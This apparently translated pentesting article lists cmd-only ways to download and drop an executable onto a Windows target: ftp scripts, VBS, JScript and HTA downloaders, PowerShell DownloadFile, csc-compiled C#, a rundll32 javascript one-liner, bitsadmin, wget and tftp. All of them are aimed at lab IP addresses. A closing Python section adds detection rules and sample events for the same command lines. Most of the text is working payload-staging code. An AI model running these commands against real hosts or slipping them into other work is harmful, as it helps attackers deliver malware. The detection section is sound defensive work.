Penetration technique analysis: N methods for uploading files through cmd
0x00 Preface
During a penetration test, files often need to be uploaded to the target host. I ran into this problem during recent study and testing: only a cmd shell was available to upload files to the target host (a Windows system), so this article summarizes the techniques.
0x02 Test environment
OS: Win7 x86
Test exe: ssss2.exe, which outputs 1 when run
0x03 General upload methods
1. debug
Debug is a program debugging tool with the following functions:
Directly enter, change, trace and run assembly-language source programs; observe the contents of the operating system; view the contents of the ROM BIOS; observe and change values in RAM; read and write floppy disk data by sector or by file.
It also provides a way to convert hexadecimal code back into an executable file:
Based on the goal of this article, the idea is as follows:
Convert the exe file to hexadecimal, use the echo command to write the hex code into a file, and then use debug to restore the hex code to an exe file.
Actual test:
exe2bat.exe in Kali provides this function; it is located in /usr/share/windows-binaries.
Procedure:
Kali:
```bash
cd /usr/share/windows-binaries
wine exe2bat.exe ssss2.exe ssss2.txt
```
After the command is executed, ssss2.txt is generated; copy its content and paste it into the cmd command line.
1.dll, 2017123.hex and ssss.exe will be generated after execution.
Note:
exe2bat does not support files larger than 64 KB.
2. ftp
Set up an ftp server:
IP: 192.168.174.151, file: ssss2.exe
Execute the following commands in sequence to download the file through ftp:
Cmd:
```bash
echo open 192.168.174.151 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET ssss2.exe >> ftp.txt
ftp -s:ftp.txt
```
Note:
When ftp is used for the first time, the firewall blocks it with a pop-up window, so remember to add firewall rules before using it.
3. vbs
VBS downloader, using the Msxml2.XMLHTTP and ADODB.Stream objects.
Save the following code as a .vbs file:
```vb
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.174.145/ssss2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\update\ssss2.exe",2
```
The corresponding cmd commands are:
```bash
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs
```
Running these in sequence generates download.vbs; executing download.vbs then downloads ssss2.exe.
4. powershell
Cmd:
```powershell
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')
```
5. csc
csc.exe is the C# compiler in the Microsoft .NET Framework. It is included in Windows by default and can compile a .cs file into an exe from the command line.
C# downloader code:
```csharp
using System.Net;

namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.174.145/ssss2.exe";
            string receivePath = @"C:\test\update\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName(URLAddress));
        }
    }
}
```
Use echo to write the code to download.cs, then use csc.exe to compile the cs file.
Run:
```bash
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\test\update\download.exe C:\test\update\download.cs
```
download.exe is generated successfully.
Note:
The absolute path of csc.exe depends on the .NET version installed on the system.
6. JScript
Compared with the Scripting.FileSystemObject used in JSRat, ADODB.Stream is simpler and more efficient.
Save the following code as a .js file; it can be executed directly to download the file.
```js
var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = WScript.CreateObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.Close();
}
```
Merge the statements into a single rundll32 command (similar to the JSRat startup method):
Cmd:
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}
```
After execution, the system prompts that you do not have permission. This is interesting; more details will be covered in future articles.
7. hta
The hta version adds minimizing the window and exiting automatically: the hta window is minimized during execution, and the program exits on its own once the file has been downloaded.
Save the following code as a .hta file and run it:
```html
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET", "http://192.168.174.145/ssss2.exe", false);
Object.send();
if (Object.status == 200) {
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.open();
    Stream.type = 1;
    Stream.write(Object.responseBody);
    Stream.saveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.close();
}
window.close();
</script>
```
8. bitsadmin
bitsadmin is a command-line tool that can create, download, upload and monitor transfer jobs. It is included in Windows systems after XP.
Usage:
Cmd:
```bash
bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip C:\test\update\PSTools.zip
```
The download succeeds.
Note:
The https and ftp protocols are not supported.
If Kali's SimpleHTTPServer is used as the server, an error is reported.
0x04 Supplementary upload methods
The methods above use only programs included in the system by default. Combined with those methods, third-party tools can also be used to do the job.
The idea here is to download a third-party tool through bitsadmin, and then use that tool to transfer files.
1. wget
```bash
bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip C:\test\update\wget.zip
```
wget.zip is downloaded after running.
Note:
Windows does not include a command to decompress zip files by default; however, vbs can be used to decompress the zip file.
Decompress with vbs:
Save the following code as a .vbs file:
```vb
UnZip "C:\test\update\wget.zip","C:\test\update\wget\"

Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If NOT fso.FileExists(myZipFile) Then
        Exit Sub
    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
        Exit Sub
    ElseIf NOT fso.FolderExists(myTargetDir) Then
        fso.CreateFolder(myTargetDir)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set objSource = objShell.NameSpace(myZipFile)
    Set objFolderItem = objSource.Items()
    Set objTarget = objShell.NameSpace(myTargetDir)
    intOptions = 256
    objTarget.CopyHere objFolderItem, intOptions
End Sub
```
Code from http://demon.tw/programming/vbs-unzip-file.html
After successful decompression, files can be transferred through wget.exe:
```bash
C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe
```
2. tftp
Similarly, bitsadmin is used to download tftp.exe, and tftp is then used to transfer the file.
```bash
bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe
```
After the download succeeds, use tftp to transfer the file:
```bash
tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe
```
Note:
The default firewall blocks this; turn off the firewall or add rules.
0x05 Summary
This article sorts out some commonly used techniques for transferring files through cmd, focusing on the more common and simple methods; it therefore leaves out implementations that require setting up a development environment, such as Python, Ruby, PHP, etc. If you have better implementation methods, please contact me so we can learn together.
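From the defender's side, every method above leaves a recognizable process command line (ftp -s:, powershell DownloadFile, csc.exe /out:, rundll32 javascript:, bitsadmin /transfer, tftp -i ... GET). The following Python is an added example, not part of the original article: it runs simple rules over constructed process-creation events modelled on those command lines and pulls out the remote URL or IP for triage; the image paths, rule names and events are all constructed here.

```python
import re

# Constructed process-creation events (image path, command line) modelled on the
# commands shown in this article; not real telemetry. The last one is benign.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\ftp.exe", "ftp -s:ftp.txt"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell (new-object System.Net.WebClient).DownloadFile("
     "'http://192.168.174.145/ssss2.exe','C:\\test\\update\\ssss2.exe')"),
    (r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     r"csc.exe /out:C:\test\update\download.exe C:\test\update\download.cs"),
    (r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'),
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip C:\test\update\PSTools.zip"),
    (r"C:\Windows\System32\tftp.exe", r"tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe"),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\test\notes.txt"),
]

# (rule name, image basename, command-line regex), one per technique above.
RULES = [(name, img, re.compile(pat, re.I)) for name, img, pat in [
    ("ftp scripted session", "ftp.exe", r"(^|\s)-s:"),
    ("powershell WebClient download", "powershell.exe", r"DownloadFile\s*\("),
    ("csc compile from command line", "csc.exe", r"/out:"),
    ("rundll32 javascript protocol", "rundll32.exe", r"javascript:"),
    ("bitsadmin transfer job", "bitsadmin.exe", r"/transfer\b"),
    ("tftp binary get", "tftp.exe", r"\s-i\s.*\bGET\b"),
    ("script host run", "cscript.exe", r"\.(vbs|js)\b"),
    ("hta execution", "mshta.exe", r"\.hta\b"),
]]
URL_OR_HOST = re.compile(r"https?://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(image, cmdline):
    """Names of the rules that fire for one (image, command line) event."""
    exe = basename(image)
    return [name for name, img, pat in RULES if exe == img and pat.search(cmdline)]

def remote(cmdline):
    """First URL or dotted IPv4 on the command line, for triage; None if absent."""
    m = URL_OR_HOST.search(cmdline)
    return m.group(0) if m else None

def scan(events):
    """(image basename, rule names, remote) for every event that matches a rule."""
    hits = [(basename(i), classify(i, c), remote(c)) for i, c in events]
    return [h for h in hits if h[1]]
```

Note that the ftp case yields no remote on the command line because the host lives in ftp.txt, so the script file itself is what needs collecting.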